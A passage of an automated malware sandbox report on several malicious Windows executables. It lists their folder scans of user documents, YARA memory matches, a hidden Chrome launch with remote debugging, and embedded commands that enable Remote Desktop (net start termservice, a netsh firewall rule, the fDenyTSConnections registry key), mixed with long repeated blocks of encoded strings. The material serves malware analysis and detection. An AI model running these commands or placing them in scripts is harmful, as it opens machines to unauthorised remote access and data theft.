report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                      Source: c6e8248d4e.exe Binary or memory string: WIN_XPe
                      Source: c6e8248d4e.exe Binary or memory string: WIN_VISTA
                      Source: c6e8248d4e.exe Binary or memory string: WIN_7
                      Source: c6e8248d4e.exe Binary or memory string: WIN_8
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
                      Source: Yara match File source: 0000001E.00000003.1861959536.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001E.00000003.1861451133.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000001E.00000003.1832508567.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000023.00000002.2114874783.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: 19be97887a.exe PID: 6576, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: 19be97887a.exe PID: 1496, type: MEMORYSTR

                      Remote Access Functionality

                      Source: C:\Users\user\AppData\Local\Temp\10128540101\19be97887a.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
                      Source: Yara match File source: Process Memory Space: c6e8248d4e.exe PID: 6080, type: MEMORYSTR
                      Source: Yara match File source: 35.2.19be97887a.exe.e20000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000036.00000003.1948179949.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000021.00000002.1814440673.0000000000EC1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara match File source: 00000021.00000003.1774138990.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000036.00000002.1990082511.0000000000EC1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: bb5ad48269.exe PID: 5724, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: bb5ad48269.exe PID: 6960, type: MEMORYSTR
                      Source: 483d2fa8a0d53818306efeb32d3.exe String found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000002.993370074.0000000000301000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000002.993370074.0000000000301000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000003.952949007.0000000004E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000011.00000003.952949007.0000000004E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exeString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000003.967837133.0000000004AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000003.967837133.0000000004AF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000002.1009481063.0000000000301000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: net start termservice
                      Source: 483d2fa8a0d53818306efeb32d3.exe, 00000012.00000002.1009481063.0000000000301000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exeString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000013.00000003.970504392.0000000004C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB 